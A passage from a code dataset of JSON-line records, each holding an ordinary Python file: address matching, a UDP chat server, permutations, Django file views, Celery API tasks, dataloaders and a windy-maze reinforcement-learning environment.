'address1','address2','address','streetNumber','streetName','streetType','unitName','unitType','city','zip','name')\n\taddressVarsTypeList1 = ['address1','address2','city','zip','name'],\n\t# Directory of second dataset\n\tinDir2 = '~/InputDirectory2', \n\t# File name of second dataset\n\tinDSN2 = 'Dataset2.csv', \n\t# Extra variables to keep from second dataset\n\tkeepVars2 = ['ACCT_ID'],\n\t# Address variable names in second dataset (as they are)\n\taddressVarsList2 = ['CITY','ADDRESS','POSTAL','CUST_NAME'], \n\t# Types of address variables in the second dataset \n\t# (can be 'address1','address2','address','streetNumber','streetName','streetType','unitName','unitType','city','zip','name')\n\taddressVarsTypeList2 = ['city','address','zip','name']\t\n)\n\n# Execute the matchAddresses method on the matchAddresses class (only outputs observations where \"match\" = 1)\n# NOTE: this does NOT guarantee a unique match, it is possible for multiple pairs to match each other\nclnAdd.matchAddresses(\n\t# Which dataset is being \"kept\" can be either '1','2', or 'both', this will determine how matches are searched for\n\tkeep = '2',\n\t# Variables that MUST be equal to consider the pair a match (from addressVarsTypeLists defined above)\n\thardByVars = ['zip','streetName','streetNumber'],\n\t# Variables that will also be checked for a match \n\t# (if they aren't equal, then they will be output, but a \"check\" variable will be set to 1 to flag them)\n\tsoftByVars = ['unitNumber','name'],\n\t# Relevant to businesses, if the hardByVars don't match, should the business name be used to check a match?\n\t# NOTE: will perform jaro similarity between two strings on EACH word in the business name and set match = 1 if any of the words\n\t# are above the threshold\n\tcheckName = True,\n\t# Minimum word on word Jaro similarity to be considered a match (default is 1)\n\tjaro_th = 0.9,\n\t# Should a csv be output? Default True\n\toutput_csv = True, \n\t# If outputing a csv, output directory, default is input directory\n\toutDir = '~/OutputDirectory',\n\t# If outputing a csv, output filename, default is \"matchedAddresses\"\n\toutDSN = 'outputDataset.csv'\n)\n","repo_name":"Stanford-Urban-Water-Policy-Innovation/matchAddresses","sub_path":"exampleCaller.py","file_name":"exampleCaller.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38020902369","text":"import socket\nimport time\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nhost = ''\nport = 9999\ns.bind((host, port))\n\nclients = []\nquitting = False\nprint('Server started. 
Socket bind to port %s' % (port))\n\nwhile not quitting:\n try:\n data, addr = s.recvfrom(1024)\n if 'Quit' in data.decode():\n quitting = True\n if addr not in clients:\n clients.append(addr)\n for client in clients:\n if client != addr:\n s.sendto(data, client)\n print(time.ctime(time.time()) + addr.decode() + '::' + data.decode())\n except:\n pass\ns.close()","repo_name":"ThucLPT/lab","sub_path":"NetCentric/Lab7/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25719045578","text":"# insert an element in all possible places\ndef ins(x,xs) :\n for i in range(len(xs)) :\n yield xs[:i]+[x]+xs[i:]\n yield xs + [x]\n\n# insert first in each permutation of the rest of a list\ndef perm(xs) :\n if not xs : yield []\n else :\n for ps in perm(xs[1:]) :\n for rs in ins(xs[0],ps) :\n yield rs\n\n\n# alternative, with immutable\n\nimport immutables as im\n\ndef selectFirst(Xs):\n if not Xs:\n return None\n else:\n X, Ys = Xs\n yield (X, Ys)\n for (Z, Zs) in selectFirst(Ys):\n yield (Z, (X, Zs))\n\n\ndef perm1(Xs):\n if not Xs:\n yield None\n else:\n for (X, Ys) in selectFirst(Xs):\n for Zs in perm1(Ys):\n yield (X, Zs)\n\n\ndef permute(Ls):\n Is = im.fromList(Ls)\n for Ps in perm1(Is):\n yield im.toList(Ps)\n\n\n# tests\n\nt1 = list(ins('*',[1,2,3]))\n\ndef t2() :\n for p in perm([1,2,3]) :\n print(p)\n\nt5 = list(selectFirst((0,(1,(2,(3,None))))))\n\nt6 = list(perm1((0,(1,(2,(3,(4,None)))))))\n\nt7 = im.fromList([0,1,2,3,4])\n\nt8 = im.toList(t7)\n\nt5 = list(permute([1,2,3,4]))\n\ndef t6() :\n for P in permute([1,2,3,4]) :\n print(P)\n\nif __name__ == \"__main__\" :\n t2()\n \n\n","repo_name":"ptarau/PyPL","sub_path":"2021/perm.py","file_name":"perm.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"24834073135","text":"from past.builtins import basestring\nfrom builtins import object\nfrom gnr.core.gnrbag import Bag\nfrom gnr.core.gnrhtml import GnrHtmlBuilder\n\nclass Table(object):\n def config_db(self, pkg):\n tbl = pkg.table('htmltemplate', pkey='id', name_long='!!Letterhead',\n name_plural='!!Letterheads', rowcaption='name',noTestForMerge=True)\n self.sysFields(tbl)\n tbl.column('name', name_long='!!Name',validate_notnull=True)\n tbl.column('username', name_long='!!Username')\n tbl.column('version', name_long='!!Version')\n tbl.column('type_code',size=':15',name_long='Type').relation('letterhead_type.code',relation_name='letterheads',mode='foreignkey',onDelete='raise')\n tbl.column('data', dtype='X', name_long='!!Data', _sendback=True)\n tbl.column('center_height',dtype='I',name_long='!!Center height')\n tbl.column('center_width',dtype='I',name_long='!!Center width')\n\n tbl.column('based_on',size='22' ,group='_',name_long='!!Based on').relation('htmltemplate.id',relation_name='children',one_one=True,mode='foreignkey',onDelete='raise',deferred=True)\n tbl.column('next_letterhead_id',size='22' ,group='_',name_long='!!Next letterhead').relation('htmltemplate.id',relation_name='previous',one_one=True,mode='foreignkey',onDelete='raise',deferred=True)\n\n\n def getTemplate(self,letterhead_id=None,name=None):\n if not(name or letterhead_id):\n return Bag()\n result = Bag()\n if letterhead_id:\n pkeys = self.letterheadChain(letterhead_id)\n f = self.query(where='$id IN :pkeys', pkeys=pkeys, columns='*,$data').fetchAsDict('id')\n if not f:\n return result\n for 
i,pkey in enumerate(pkeys):\n result.setItem('layer_%i' %i,Bag(f[pkey]['data']))\n if f[letterhead_id]['next_letterhead_id']:\n result['next_letterhead'] = self.getTemplate(f[letterhead_id]['next_letterhead_id'])\n return result\n else:\n templatelist = name.split(',')\n f = self.query(where='$name IN :names', names=templatelist, columns='name,version,data').fetchAsDict(key='name')\n if not f:\n return result\n for i,name in enumerate(templatelist):\n result.setItem('layer_%i' %i,Bag(f[name]['data']))\n return result \n\n def letterheadChain(self,letterhead_id):\n result = [letterhead_id]\n based_on = True\n while based_on:\n based_on = self.readColumns(pkey=result[0],columns='$based_on')\n if based_on:\n result = [based_on]+result\n return result\n\n def getHtmlBuilder(self,letterhead_pkeys=None):\n \"\"\"Prepare the layout template\n \n :param tpl: the template\"\"\"\n \n letterhead_pkeys = letterhead_pkeys.split(',') if isinstance(letterhead_pkeys,basestring) else letterhead_pkeys\n first_letterhead = letterhead_pkeys[0]\n f = self.query(where='$id IN :pk',pk=letterhead_pkeys,bagFields=True).fetchAsDict('id')\n first_letterhead_record = f[first_letterhead]\n if len(letterhead_pkeys) == 1 and first_letterhead_record['based_on']:\n return self.getHtmlBuilder(self.letterheadChain(first_letterhead))\n base_letterhead_bag = Bag()\n base_letterhead_bag.setItem('layer_0',Bag(first_letterhead_record['data']))\n builder = GnrHtmlBuilder(htmlTemplate=base_letterhead_bag)\n builder.initializeSrc()\n height=builder.page_height - builder.page_margin_top - builder.page_margin_bottom\n width=builder.page_width - builder.page_margin_left - builder.page_margin_right\n #page = builder.body.div(height='%imm' %builder.page_height,width='%imm' %builder.page_width,\n # position='relative',_class='letterhead_page')\n\n page = builder.body.div(style=\"\"\"position:relative;\n width:%smm;\n height:%smm;\n top:0mm;\n left:0mm;\n \"\"\" % (builder.page_width, builder.page_height),\n _class='letterhead_page')\n\n\n builder.letterhead_root = page.div(style=\"\"\"position:absolute;\n top:%imm;\n left:%imm;\n right:%imm;\n bottom:%imm;\"\"\" % (\n builder.page_margin_top, builder.page_margin_left,\n builder.page_margin_right, builder.page_margin_bottom))\n\n for i,pkey in enumerate(letterhead_pkeys):\n regions = self.letterhead_layer(builder, Bag(f[pkey]['data']),width=width,height=height,count=i)\n builder._regions = regions\n regions['center_center'].attributes['content_node'] ='t'\n return builder\n \n def letterhead_layer(self,builder,letterheadBag,width=None,height=None,count=None):\n layout = builder.letterhead_root.layout(top=0,left=0,border=0,width=width,height=height,z_index=count)\n regions = dict(center_center=layout)\n if letterheadBag['main.design'] == 'headline':\n for region in ('top', 'center', 'bottom'):\n height = float(letterheadBag['layout.%s?height' % region] or 0)\n if region == 'center' or height:\n row = layout.row(height=height)\n for subregion in ('left', 'center', 'right'):\n width = float(letterheadBag['layout.%s.%s?width' % (region, subregion)] or 0)\n if subregion == 'center' or width:\n innerHTML = letterheadBag['layout.%s.%s.html' % (region, subregion)] or None\n if innerHTML:\n innerHTML = \"%s::HTML\" % innerHTML\n regions['%s_%s' % (region, subregion)] = row.cell(content=innerHTML, width=width, border=0,\n overflow='hidden')\n elif letterheadBag['main.design'] == 'sidebar':\n mainrow = layout.row(height=0)\n for region in ('left', 'center', 'right'):\n width = 
float(letterheadBag['layout.%s?width' % region] or 0)\n if region == 'center' or width:\n col = mainrow.cell(width=width, border=0).layout()\n for subregion in ('top', 'center', 'bottom'):\n height = float(letterheadBag['layout.%s.%s?height' % (region, subregion)] or 0)\n if subregion == 'center' or height:\n row = col.row(height=height)\n innerHTML = letterheadBag['layout.%s.%s.html' % (region, subregion)] or None\n if innerHTML:\n innerHTML = \"%s::HTML\" % innerHTML\n regions['%s_%s' % (region, subregion)] = row.cell(content=innerHTML, border=0,overflow='hidden')\n return regions\n\n\n def onDuplicating(self,record):\n record['name'] = '%s (copy)' %record['name']\n\n def updateCenterSize(self,record):\n pass\n \n def trigger_onInserting(self,record):\n self.updateCenterSize(record)\n\n def trigger_onUpdating(self,record=None,old_record=None):\n self.updateCenterSize(record)\n\n \n def use_dbstores(self,forced_dbstore=None, env_forced_dbstore=None,**kwargs):\n return True\n","repo_name":"genropy/genropy_saved","sub_path":"projects/gnrcore/packages/adm/model/htmltemplate.py","file_name":"htmltemplate.py","file_ext":"py","file_size_in_byte":7648,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"5"} +{"seq_id":"5837960353","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nwith open(\"requirements.txt\", \"r\") as fh:\n requirements = fh.read().splitlines()\n\nsetuptools.setup(\n name=\"smurfs\",\n version=\"1.1.12\",\n author=\"Marco Müllner\",\n author_email=\"muellnermarco@gmail.com\",\n description=\"Smart UseR Frequency analySer, a fast and easy to use frequency analyser.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/muma7490/SMURFS\",\n install_requires=requirements,\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n entry_points={\n 'console_scripts':['smurfs = smurfs.__main__:main']\n }\n)\n","repo_name":"MarcoMuellner/SMURFS","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"1217419891","text":"import argparse\r\nimport sys\r\nimport torch\r\nfrom fuzzywuzzy import fuzz\r\nfrom textstat.textstat import textstat\r\n\r\nimport spacy\r\nfrom collections import Counter\r\nimport numpy as np\r\n\r\nnlp = spacy.load('en')\r\n\r\n\r\ndef inorder(node):\r\n tags = str(node.dep_) +\" \"\r\n #print tags, node.text\r\n if node.lefts:\r\n for n in node.lefts:\r\n tags+= inorder(n)\r\n if node.rights:\r\n for n in node.rights:\r\n tags+= inorder(n)\r\n return tags\r\n\r\ndef doc_sim(doc1,doc2):\r\n sim = doc1.similarity(doc2)\r\n return sim\r\n\r\ndef tree_sim(doc1,doc2):\r\n ino1 = \"\"\r\n ino2 = \"\"\r\n for tok in doc1:\r\n if tok.dep_==\"ROOT\":\r\n ino1 = inorder(tok)\r\n break\r\n for tok in doc2:\r\n if tok.dep_==\"ROOT\":\r\n ino2 = inorder(tok)\r\n break\r\n ts = fuzz.ratio(ino1,ino2)\r\n return ts\r\n\r\ndef sentence_stats(s1,s2):\r\n #s2 should be predictions and s1 should be source\r\n try:\r\n fkdiff = textstat.flesch_reading_ease(s2)-textstat.flesch_reading_ease(s1)\r\n except Exception:\r\n fkdiff = 0.0\r\n doc1 = nlp(s1)\r\n doc2 = nlp(s2)\r\n ts = tree_sim(doc1,doc2)/100\r\n ds = 
doc_sim(doc1,doc2)\r\n return (torch.FloatTensor([fkdiff,ts,ds]))\r\n\r\ndef main():\r\n # Parse command line arguments\r\n parser = argparse.ArgumentParser(description='edit distance')\r\n parser.add_argument('-i', '--input', default=sys.stdin.fileno(), help='the input file (defaults to stdin)')\r\n parser.add_argument('-src','--source',default=\"\",help='source file with which edit distance should be calculated.')\r\n args = parser.parse_args()\r\n infile = open(args.input,'r')\r\n srcfile = open(args.source,'r')\r\n inplines = [ln.strip() for ln in infile]\r\n srclines = [ln.strip() for ln in srcfile]\r\n stats = torch.FloatTensor(3).fill_(0.0)\r\n for i in range(len(inplines)):\r\n \tstats+=sentence_stats(srclines[i],inplines[i])\r\n stats=stats.div(len(inplines))\r\n print(\"(fkdiff,ts,ds) between {} and {} are: {:.4f} {:.4f} {:.4f}\".format(args.input.split(\"/\")[-1],args.source.split(\"/\")[-1]\\\r\n ,stats[0],stats[1],stats[2]))\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"subramanyamdvss/UnsupNTS","sub_path":"utils/fk_ts_ds.py","file_name":"fk_ts_ds.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"5"} +{"seq_id":"21257233846","text":"import pandas as pd\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom eda_data import word_eda\n\n\ndef tokenized_dataset(dataset, tokenizer, max_len):\n tokenized_sentences = tokenizer(\n list(dataset[\"title\"]),\n return_tensors=\"pt\",\n padding=True,\n truncation=True,\n max_length=max_len,\n )\n return tokenized_sentences\n\n\nclass Headline_Dataset(Dataset):\n def __init__(self, tokenized_dataset, idx):\n self.tokenized_dataset = tokenized_dataset\n self.idx = idx\n\n def __getitem__(self, ind):\n item = {\n key: torch.tensor(val[ind]) for key, val in self.tokenized_dataset.items()\n }\n item[\"idx\"] = torch.tensor(self.idx[ind])\n return item\n\n def __len__(self):\n return len(self.idx)\n\n\ndef pororo_data(df):\n df_origin = df.loc[:, [\"index\", \"title\", \"topic_idx\"]]\n \n # add the Korean -> English -> Korean back-translated titles\n df_en_ko = df.loc[:, [\"index\", \"title_en_ko\", \"topic_idx\"]]\n df_en_ko.rename(columns={\"title_en_ko\": \"title\"}, inplace=True)\n\n # add the Korean -> Japanese -> Korean back-translated titles\n # df_ja_ko = df.loc[:, [\"index\", \"title_ja_ko\", \"topic_idx\"]]\n # df_ja_ko.rename(columns={\"title_ja_ko\": \"title\"}, inplace=True)\n\n df_concat = pd.concat([df_origin, df_en_ko], axis=0)\n return df_concat\n\ndef gpt_plus(df) :\n gpt = pd.read_csv(\"/content/drive/MyDrive/Colab Notebooks/data/news_headline_data/gpt_it.csv\")\n gpt['topic_idx'] = 0\n gpt.rename(columns={'Unnamed: 0' : 'index'}, inplace=True)\n gpt.title = gpt.title.apply(word_eda)\n df_concat = pd.concat([df, gpt], axis=0)\n return df_concat\n\ndef split_data(train_data, train_idx, dev_idx, tokenizer, config):\n train_dataset = train_data.loc[train_idx]\n dev_dataset = train_data.loc[dev_idx]\n if config.translate == 1:\n train_dataset = pororo_data(train_dataset)\n if config.gpt_data == 1 :\n train_dataset = gpt_plus(train_dataset) # append the GPT headline file (okay to remove)\n train_label = train_dataset.topic_idx.values\n dev_label = dev_dataset.topic_idx.values\n tokenized_trainset = tokenized_dataset(train_dataset, tokenizer, config.max_len)\n tokenized_devset = tokenized_dataset(dev_dataset, tokenizer, config.max_len)\n trainset = Headline_Dataset(tokenized_trainset, train_label)\n devset = Headline_Dataset(tokenized_devset, dev_label)\n train_loader = DataLoader(\n trainset,\n batch_size=config.batch_size,\n 
num_workers=config.num_worker,\n shuffle=True,\n )\n dev_loader = DataLoader(\n devset,\n batch_size=config.batch_size,\n num_workers=config.num_worker,\n shuffle=False,\n )\n return train_loader, dev_loader\n\n\ndef test_dataloader(test_data, tokenizer, config):\n test_data[\"idx\"] = 0\n test_dataset = test_data\n test_dataset = tokenized_dataset(test_dataset, tokenizer, config.max_len)\n test_dataset = Headline_Dataset(test_dataset, test_data.idx.values)\n test_loader = DataLoader(test_dataset, batch_size=config.batch_size, shuffle=False)\n return test_loader\n","repo_name":"KimJinHye0n/News_Topic_Classification_Dacon","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"18154380718","text":"from django.shortcuts import render\nfrom .models import FileObject\nfrom social_django.models import UserSocialAuth\n# from social_django \nfrom django.contrib.auth.models import User\n\n\n# Create your views here.\ndef home(request):\n object_list = None\n if request.user.is_authenticated:\n object_list = FileObject.objects.filter(owner__username=request.user.username)\n if request.user.username == 'admin':\n object_list = FileObject.objects.all()\n return render(request, 's3objects/home.html', {'object_list': object_list})\n\n\ndef account(request):\n user_list = UserSocialAuth.objects.all()\n return render(request, 's3objects/account.html', {'sau': user_list})\n\n\nfrom django import forms\nfrom django.http import HttpResponseRedirect\n\n\nclass S3ObjectForm(forms.ModelForm):\n class Meta:\n model = FileObject\n fields = ['file', 'description']\n exclude = ('owner',)\n\n\ndef uploadFile(request):\n if request.user.is_authenticated:\n if request.method == 'POST':\n form = S3ObjectForm(request.POST, request.FILES)\n if form.is_valid():\n new_s3object = form.save(commit=False)\n new_s3object.owner = request.user\n new_s3object = form.save()\n return HttpResponseRedirect('/')\n else:\n form = S3ObjectForm()\n return render(request, 's3objects/upload.html', {'form': form})\n else:\n return HttpResponseRedirect('/login/')\n\n\ndef updateFile(request, id):\n if request.user.is_authenticated and FileObject.objects.get(pk=id).owner == request.user:\n old_file = FileObject.objects.get(pk=id)\n form = S3ObjectForm(request.POST or None, request.FILES, instance=old_file)\n if request.POST and form.is_valid():\n form.save()\n return HttpResponseRedirect('/')\n\n return render(request, 's3objects/upload.html', {'form': form})\n else:\n return HttpResponseRedirect('/login/')\n\n\ndef deleteFile(request, id):\n if request.user.is_authenticated and (FileObject.objects.get(pk=id).owner == request.user or request.user == \"admin\") :\n sel_file = FileObject.objects.get(pk=id)\n if request.method == 'POST':\n sel_file.delete()\n return HttpResponseRedirect('/')\n\n return render(request, 's3objects/delete.html', {'sel_file': sel_file})\n else:\n return HttpResponseRedirect('/login/')\n\n\nfrom django.contrib.auth.forms import UserCreationForm\n\n\nclass RegistrationForm(UserCreationForm):\n class Meta:\n model = User\n fields = ['username', 'first_name', 'last_name', 'email']\n\n\ndef register(request):\n if request.user.is_authenticated:\n return HttpResponseRedirect('/')\n else:\n if request.method == 'POST':\n form = RegistrationForm(request.POST)\n if form.is_valid():\n new_user = form.save()\n return HttpResponseRedirect('/')\n else:\n form = RegistrationForm()\n 
return render(request, 's3objects/registration/register.html', {'form': form})\n","repo_name":"TPriyanka22/CMPE281_P1","sub_path":"backend/fileUpload/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11533004898","text":"#!/usr/bin/env python3\nfrom sys import argv\nfrom traceback import print_exc\n\n\ndef main():\n hands = {\"A\": 0, \"B\": 1, \"C\": 2, \"X\": 0, \"Y\": 1, \"Z\": 2}\n score = 0\n\n with open(\"input.txt\", \"r\") as file:\n for line in file:\n opp, me = line.split()\n if (hands[opp] + 1) % 3 == hands[me]:\n score += 6\n elif hands[opp] == hands[me]:\n score += 3\n # else we lost += 0\n\n score += hands[me] + 1\n\n print(score)\n\n\nif __name__ == '__main__':\n try:\n main()\n except (SystemExit, KeyboardInterrupt, GeneratorExit, Exception) as err:\n print_exc()\n\n","repo_name":"sudo-grue/aoc22","sub_path":"day02/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"16703959710","text":"import requests\nfrom celery import shared_task\n\nfrom apps.account.models import Company\nfrom apps.main.models import FnsKeys\n\n\n@shared_task\ndef check_limit_key_fns():\n \"\"\"CELERY task that checks how much of a key's request limit has been used in the FNS service\"\"\"\n # constants for configuring the API\n HOST = 'https://api-fns.ru/api/stat'\n\n keys = FnsKeys.objects.all()\n for key in keys:\n params = f'?key={key}'\n url = HOST + params\n response = requests.get(url).json()\n key.response_count = int(response['Методы']['egr']['Истрачено'])\n if key.response_count >= 100:\n key.active = False\n key.save()\n return key.key\n\n\n@shared_task\ndef api_to_fns_update():\n \"\"\" CELERY task that refreshes the stored company information\"\"\"\n HOST = 'https://api-fns.ru/api/egr'\n # take the first active key (active means fewer than 100 requests this month)\n key = FnsKeys.objects.get(active=True)\n companies = Company.objects.all()\n for company in companies:\n inn = company.inn\n params = f'?req={inn}&key={key}'\n url = HOST + params\n # send the request\n response = requests.get(url).json()\n # increment the key's request counter\n key.response_count += 1\n key.save()\n # update the company data\n company.name_full = response['items'][0]['ЮЛ']['НаимПолнЮЛ']\n company.name_short = response['items'][0]['ЮЛ']['НаимСокрЮЛ']\n company.company_okopf = response['items'][0]['ЮЛ']['ОКОПФ']\n company.inn = response['items'][0]['ЮЛ']['ИНН']\n company.kpp = response['items'][0]['ЮЛ']['КПП']\n company.ogrn = response['items'][0]['ЮЛ']['ОГРН']\n company.ogrn_data_reg = response['items'][0]['ЮЛ']['ДатаРег']\n company.director = response['items'][0]['ЮЛ']['Руководитель']['ФИОПолн']\n company.adress = response['items'][0]['ЮЛ']['Адрес']['АдресПолн']\n company.save()\n return company.name_full\n\n\n","repo_name":"ITS1Lv3R/backend_bot","sub_path":"apps/api/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"19693507260","text":"class Vehiculo:\n\tcolor = ''\n\truedas = 0\n\tpuertas = 0\n\n\nclass Coche(Vehiculo):\n\tvelocidad = 0\n\tcilindrada = 0\n\ncoche1 = Coche()\ncoche1.color = \"rojo\"\ncoche1.ruedas = 4\ncoche1.puertas = 4\ncoche1.velocidad = 50\ncoche1.cilindrada = 1500\n\nprint(\"El coche es color \"+coche1.color+\" y tiene 
\"+str(coche1.ruedas)+\" ruedas, \"+str(coche1.puertas)+\" puertas\")\nprint(\"El coche tiene una cilindrada de \"+str(coche1.cilindrada)+\"cc y viaja a una velociad de \"+str(coche1.velocidad)+\"km/h\")\n\n","repo_name":"jsandi321/Open-BootCamp","sub_path":"Python/Leccion06/Ejercicio01.py","file_name":"Ejercicio01.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6521669394","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport random\nimport pygame as pg\nimport seaborn as sns\nsns.set()\n\nclass enviroment_gen():\n def __init__(self, height : int, width : int, wind : list, is_random: bool = False):\n \"\"\"\n Generate a simulating environment.\n\n :param height: Maze Height;\n :param width: Maze WIDTH;\n :param wind: Winds list along the columns, hence its length should be WIDTH;\n :param is_random: whether the wind is random;\n \"\"\"\n self.HEIGHT = height\n self.WIDTH = width\n self.WIND = wind\n self.is_random = is_random\n \n # must set valid wind list\n if len(self.WIND) != self.WIDTH:\n self.WIND = [0] * self.WIDTH # reset it to zero\n print(\"Notice: Given wrong wind list, reset to zero!\")\n \n # get the environment matrix and display winodw\n self.__maze = self.visualize()\n\n # possible actions\n self.ACTION_UP = 0\n self.ACTION_DOWN = 1\n self.ACTION_LEFT = 2\n self.ACTION_RIGHT = 3\n\n def step(self, state : list, action : int):\n \"\"\"\n Generate next state based on current state and action.\n Notice that the wind affect should be based on current state, not next-state.\n Tips: we make sure that the agent will not pass-through the wall by `step(state,action)`.\n\n :param state: current state;\n :param action: action choosen;\n :return: next state (a (2,1) list);\n \"\"\"\n i, j = state\n # notice: the left corner is [0,0] and the right corner is [HEIGHT - 1, WIDTH - 1]\n if self.__maze[i,j] == -10: # you can't get to a wall state\n print(\"Something went wrong!\")\n print(i,j)\n assert False\n \n if self.is_random:\n self.WIND[j] = np.random.choice(2,1) -1 # randomly choose from {-1,0,1}\n if action == self.ACTION_UP:\n end = min(max(i - 1 - self.WIND[j], 0), self.HEIGHT - 1)\n if end <= i:\n if np.any(self.__maze[end:i + 1, j] == -10): # blocked by walls\n end = end + np.where(self.__maze[end:i + 1, j] == -10)[0][-1] # 从下往上走, 取 -1 [相对位置]\n return [min(end + 1, i), j]\n else:\n return [end,j]\n else:\n if np.any(self.__maze[i:end + 1, j] == -10): # blocked by walls\n end = i + np.where(self.__maze[i:end + 1, j] == -10)[0][0] # 从上往下走, 取 0 [相对位置]\n return [max(end - 1, i), j]\n else:\n return [end,j]\n \n elif action == self.ACTION_DOWN:\n end = max(min(i + 1 - self.WIND[j], self.HEIGHT - 1), 0)\n if end >= i:\n if np.any(self.__maze[i:end + 1, j] == -10): # blocked by walls\n end = i + np.where(self.__maze[i:end + 1, j] == -10)[0][0] # 从上往下走, 取 0\n return [max(end - 1, i), j]\n else:\n return [end, j]\n else:\n if np.any(self.__maze[end:i + 1, j] == -10): # blocked by walls\n end = end + np.where(self.__maze[end:i + 1, j] == -10)[0][-1] # 从下往上走, 取 -1\n return [min(end + 1, i), j]\n else:\n return [end, j]\n \n elif action == self.ACTION_LEFT:\n if self.__maze[i, max(j - 1, 0)] == -10:\n return [i, j]\n end = min(max(i - self.WIND[j], 0), self.HEIGHT - 1)\n if end <= i:\n if np.any(self.__maze[end:i + 1, max(j - 1, 0)] == -10): # blocked by walls\n end = end + np.where(self.__maze[end:i + 1, max(j - 1, 0)] == -10)[0][-1] # 从下往上走, 取 -1\n 
return [min(end + 1, i), max(j - 1, 0)]\n else:\n return [end, max(j - 1, 0)]\n else:\n if np.any(self.__maze[i:end + 1, max(j - 1, 0)] == -10): # blocked by walls\n end = i + np.where(self.__maze[i:end + 1, max(j - 1, 0)] == -10)[0][0] # 从上往下走, 取 0\n return [max(end - 1, i), max(j - 1, 0)]\n else:\n return [end, max(j - 1, 0)]\n \n elif action == self.ACTION_RIGHT:\n if self.__maze[i, min(j + 1, self.WIDTH - 1)] == -10:\n return [i, j]\n end = min(max(i - self.WIND[j], 0), self.HEIGHT - 1)\n if end <= i:\n if np.any(self.__maze[end:i + 1, min(j + 1, self.WIDTH - 1)] == -10): # blocked by walls\n end = end + np.where(self.__maze[end:i + 1, min(j + 1, self.WIDTH - 1)] == -10)[0][-1] # 从下往上走, 取 -1\n return [min(end + 1, i), min(j + 1, self.WIDTH - 1)]\n else:\n return [end, min(j + 1, self.WIDTH - 1)]\n else:\n if np.any(self.__maze[i:end + 1, min(j + 1, self.WIDTH - 1)] == -10): # blocked by walls\n end = i + np.where(self.__maze[i:end + 1, min(j + 1, self.WIDTH - 1)] == -10)[0][0] # 从上往下走, 取 0\n return [max(end - 1, i), min(j + 1, self.WIDTH - 1)]\n else:\n return [end, min(j + 1, self.WIDTH - 1)]\n else:\n assert False\n \n def visualize(self):\n \"\"\"\n Generate the MAZE. 使用说明:\n 1. 按下鼠标左键设置起点;\n 2. 按下鼠标右键设置终点;\n 3. 鼠标滚轮上滑设置路径;\n 4. 鼠标滚轮下滑设置墙(障碍物);\n\n :return: Matrix form of the `maze` environment;\n \"\"\"\n # set width and height of UI window\n window_height = self.HEIGHT*18\n window_width = self.WIDTH*18\n\n # initialize PyGame\n pg.init()\n\n # create PyGame window\n win = pg.display.set_mode((window_width,window_height))\n pg.display.set_caption(\"RL for Windy Maze\")\n\n # set drawable dimensions of each cell\n width_ = 15\n margin_ = 3\n\n # set drawable objects\n maze = [[-1 for _ in range(0, self.WIDTH)]\n for _ in range(0, self.HEIGHT)]\n grid = np.array(maze)\n\n # initialize loop for customizing maze grid\n setup = True\n self.update(grid, win, width_, margin_)\n while setup:\n for event in pg.event.get():\n if event.type == pg.QUIT:\n setup = False\n pg.display.quit()\n pg.quit()\n \n # take user input for drawing game environment\n elif event.type == pg.MOUSEBUTTONDOWN:\n pos = pg.mouse.get_pos()\n column = pos[0] // (width_ + margin_)\n row = pos[1] // (width_ + margin_)\n if event.button == 1: # 按下鼠标左键设置起点\n grid[row, column] = 0\n if event.button == 3: # 按下鼠标右键设置终点\n grid[row, column] = 10\n if event.button == 4: # 鼠标滚轮上滑设置路径\n grid[row, column] = -1\n if event.button == 5: # 鼠标滚轮下滑设置墙(障碍物)\n grid[row, column] = -10\n self.update(grid, win, width_, margin_)\n \n assert len(np.where(grid == 0)[0]) == 1\n assert len(np.where(grid == 10)[0]) == 1\n return grid\n \n def update(self, grid, win, width_ : int, margin_ : int):\n \"\"\"\n Visualize current MAZE based on `grid` and export it to `win`.\n\n width_ and margin_ should be constant.\n \"\"\"\n for row in range(len(grid)):\n for column in range(len(grid[row])):\n # draw cells occupied by walls\n if grid[row, column] == -10:\n pg.draw.rect(win, pg.Color(\"BLACK\"), ((width_ + margin_) * column, (width_ + margin_) * row, width_, width_))\n # draw empty cells\n if grid[row, column] == -1:\n pg.draw.rect(win, pg.Color(\"White\"), ((width_ + margin_) * column, (width_ + margin_) * row, width_, width_))\n # draw cells occupied by the end goal\n if grid[row, column] == 10:\n pg.draw.rect(win, 